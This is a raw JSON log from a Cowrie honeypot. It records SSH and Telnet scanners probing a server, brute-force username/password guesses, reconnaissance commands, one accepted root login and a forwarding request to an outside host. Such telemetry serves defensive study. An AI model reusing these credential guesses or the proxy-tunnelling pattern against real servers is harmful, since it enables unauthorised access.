{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-09T04:38:36.106830Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:36.354941Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:36.937226Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-09T04:38:36.938024Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:37.223092Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:37.829500Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-09T04:38:37.830347Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:38.111692Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:38:38.634957Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-09T04:38:38.635745Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:38.823308Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.closed","duration":"28.4","message":"Connection lost after 28.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:38.824413Z","src_ip":"102.68.86.62","session":"f057a6de57a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44063,"dst_ip":"1.2.3.4","dst_port":23,"session":"c672da30a684","protocol":"telnet","message":"New connection: 212.227.125.160:44063 (1.2.3.4:23) [session: c672da30a684]","sensor":"my-vps","timestamp":"2025-09-09T04:38:43.210995Z"}
{"eventid":"cowrie.session.closed","duration":14.86828899383545,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:38:58.079217Z","src_ip":"212.227.125.160","session":"c672da30a684"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":56794,"dst_ip":"1.2.3.4","dst_port":22,"session":"25b345d4330c","protocol":"ssh","message":"New connection: 92.118.39.62:56794 (1.2.3.4:22) [session: 25b345d4330c]","sensor":"my-vps","timestamp":"2025-09-09T04:39:04.460156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:39:04.460896Z","src_ip":"92.118.39.62","session":"25b345d4330c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-09T04:39:04.490762Z","src_ip":"92.118.39.62","session":"25b345d4330c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123456","message":"login attempt [admin/admin123456] failed","sensor":"my-vps","timestamp":"2025-09-09T04:39:04.583119Z","src_ip":"92.118.39.62","session":"25b345d4330c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:39:05.615483Z","src_ip":"92.118.39.62","session":"25b345d4330c"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":59252,"dst_ip":"1.2.3.4","dst_port":22,"session":"0830e8aa13e7","protocol":"ssh","message":"New connection: 103.59.95.12:59252 (1.2.3.4:22) [session: 0830e8aa13e7]","sensor":"my-vps","timestamp":"2025-09-09T04:39:19.444077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:39:19.445390Z","src_ip":"103.59.95.12","session":"0830e8aa13e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:39:19.709269Z","src_ip":"103.59.95.12","session":"0830e8aa13e7"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"1234!@#$","message":"login attempt [ubuntu/1234!@#$] failed","sensor":"my-vps","timestamp":"2025-09-09T04:39:20.810005Z","src_ip":"103.59.95.12","session":"0830e8aa13e7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:39:22.075598Z","src_ip":"103.59.95.12","session":"0830e8aa13e7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56420,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3f5b8479af4","protocol":"ssh","message":"New connection: 217.72.205.35:56420 (1.2.3.4:22) [session: e3f5b8479af4]","sensor":"my-vps","timestamp":"2025-09-09T04:40:41.200068Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:40:41.201191Z","src_ip":"217.72.205.35","session":"e3f5b8479af4"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":59376,"dst_ip":"1.2.3.4","dst_port":22,"session":"298a3930a3e7","protocol":"ssh","message":"New connection: 103.59.95.12:59376 (1.2.3.4:22) [session: 298a3930a3e7]","sensor":"my-vps","timestamp":"2025-09-09T04:40:46.673603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:40:46.674626Z","src_ip":"103.59.95.12","session":"298a3930a3e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:40:46.944775Z","src_ip":"103.59.95.12","session":"298a3930a3e7"}
{"eventid":"cowrie.login.failed","username":"test","password":"Test1234","message":"login attempt [test/Test1234] failed","sensor":"my-vps","timestamp":"2025-09-09T04:40:48.479051Z","src_ip":"103.59.95.12","session":"298a3930a3e7"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:40:49.750852Z","src_ip":"103.59.95.12","session":"298a3930a3e7"}
{"eventid":"cowrie.session.connect","src_ip":"43.129.241.117","src_port":45524,"dst_ip":"1.2.3.4","dst_port":23,"session":"4b1223ca4cfe","protocol":"telnet","message":"New connection: 43.129.241.117:45524 (1.2.3.4:23) [session: 4b1223ca4cfe]","sensor":"my-vps","timestamp":"2025-09-09T04:41:02.706752Z"}
{"eventid":"cowrie.session.closed","duration":30.460888147354126,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:41:33.167541Z","src_ip":"43.129.241.117","session":"4b1223ca4cfe"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":55838,"dst_ip":"1.2.3.4","dst_port":22,"session":"2752dc3a6bfd","protocol":"ssh","message":"New connection: 103.59.95.12:55838 (1.2.3.4:22) [session: 2752dc3a6bfd]","sensor":"my-vps","timestamp":"2025-09-09T04:42:13.643512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:42:13.644486Z","src_ip":"103.59.95.12","session":"2752dc3a6bfd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:42:13.906305Z","src_ip":"103.59.95.12","session":"2752dc3a6bfd"}
{"eventid":"cowrie.login.failed","username":"server","password":"123123","message":"login attempt [server/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T04:42:15.378748Z","src_ip":"103.59.95.12","session":"2752dc3a6bfd"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:42:16.648913Z","src_ip":"103.59.95.12","session":"2752dc3a6bfd"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":51860,"dst_ip":"1.2.3.4","dst_port":22,"session":"10b3013df00c","protocol":"ssh","message":"New connection: 103.59.95.12:51860 (1.2.3.4:22) [session: 10b3013df00c]","sensor":"my-vps","timestamp":"2025-09-09T04:43:41.224943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:43:41.227598Z","src_ip":"103.59.95.12","session":"10b3013df00c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:43:41.490231Z","src_ip":"103.59.95.12","session":"10b3013df00c"}
{"eventid":"cowrie.login.failed","username":"db","password":"0","message":"login attempt [db/0] failed","sensor":"my-vps","timestamp":"2025-09-09T04:43:42.555416Z","src_ip":"103.59.95.12","session":"10b3013df00c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:43:43.822787Z","src_ip":"103.59.95.12","session":"10b3013df00c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35825,"dst_ip":"1.2.3.4","dst_port":22,"session":"70b04c337ebb","protocol":"ssh","message":"New connection: 212.227.235.229:35825 (1.2.3.4:22) [session: 70b04c337ebb]","sensor":"my-vps","timestamp":"2025-09-09T04:44:01.545839Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:44:01.546965Z","src_ip":"212.227.235.229","session":"70b04c337ebb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36102,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b645dcb112b","protocol":"ssh","message":"New connection: 212.227.235.229:36102 (1.2.3.4:22) [session: 2b645dcb112b]","sensor":"my-vps","timestamp":"2025-09-09T04:44:01.734904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:44:01.736132Z","src_ip":"212.227.235.229","session":"2b645dcb112b"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T04:44:01.896021Z","src_ip":"212.227.235.229","session":"2b645dcb112b"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:44:02.378320Z","src_ip":"212.227.235.229","session":"2b645dcb112b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T04:44:02.539132Z","session":"2b645dcb112b"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":48162,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cec76430417","protocol":"ssh","message":"New connection: 102.68.86.62:48162 (1.2.3.4:22) [session: 0cec76430417]","sensor":"my-vps","timestamp":"2025-09-09T04:44:12.315653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:44:12.316447Z","src_ip":"102.68.86.62","session":"0cec76430417"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:44:12.507806Z","src_ip":"102.68.86.62","session":"0cec76430417"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"!","message":"login attempt [testuser/!] failed","sensor":"my-vps","timestamp":"2025-09-09T04:44:13.256891Z","src_ip":"102.68.86.62","session":"0cec76430417"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:44:14.429295Z","src_ip":"102.68.86.62","session":"0cec76430417"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35261,"dst_ip":"1.2.3.4","dst_port":23,"session":"361374849898","protocol":"telnet","message":"New connection: 212.227.235.229:35261 (1.2.3.4:23) [session: 361374849898]","sensor":"my-vps","timestamp":"2025-09-09T04:44:56.982227Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":38228,"dst_ip":"1.2.3.4","dst_port":22,"session":"7180a09b92b6","protocol":"ssh","message":"New connection: 103.59.95.12:38228 (1.2.3.4:22) [session: 7180a09b92b6]","sensor":"my-vps","timestamp":"2025-09-09T04:45:06.095241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:45:06.096098Z","src_ip":"103.59.95.12","session":"7180a09b92b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:45:06.369050Z","src_ip":"103.59.95.12","session":"7180a09b92b6"}
{"eventid":"cowrie.login.failed","username":"minerstat","password":"1234567890","message":"login attempt [minerstat/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T04:45:07.533152Z","src_ip":"103.59.95.12","session":"7180a09b92b6"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:45:08.910887Z","src_ip":"103.59.95.12","session":"7180a09b92b6"}
{"eventid":"cowrie.session.closed","duration":11.936622858047485,"message":"Connection lost after 11 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:45:08.917692Z","src_ip":"212.227.235.229","session":"361374849898"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:45:11.734430Z","src_ip":"212.227.235.229","session":"2b645dcb112b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55859,"dst_ip":"1.2.3.4","dst_port":23,"session":"d4362198e08e","protocol":"telnet","message":"New connection: 212.227.125.160:55859 (1.2.3.4:23) [session: d4362198e08e]","sensor":"my-vps","timestamp":"2025-09-09T04:45:19.411916Z"}
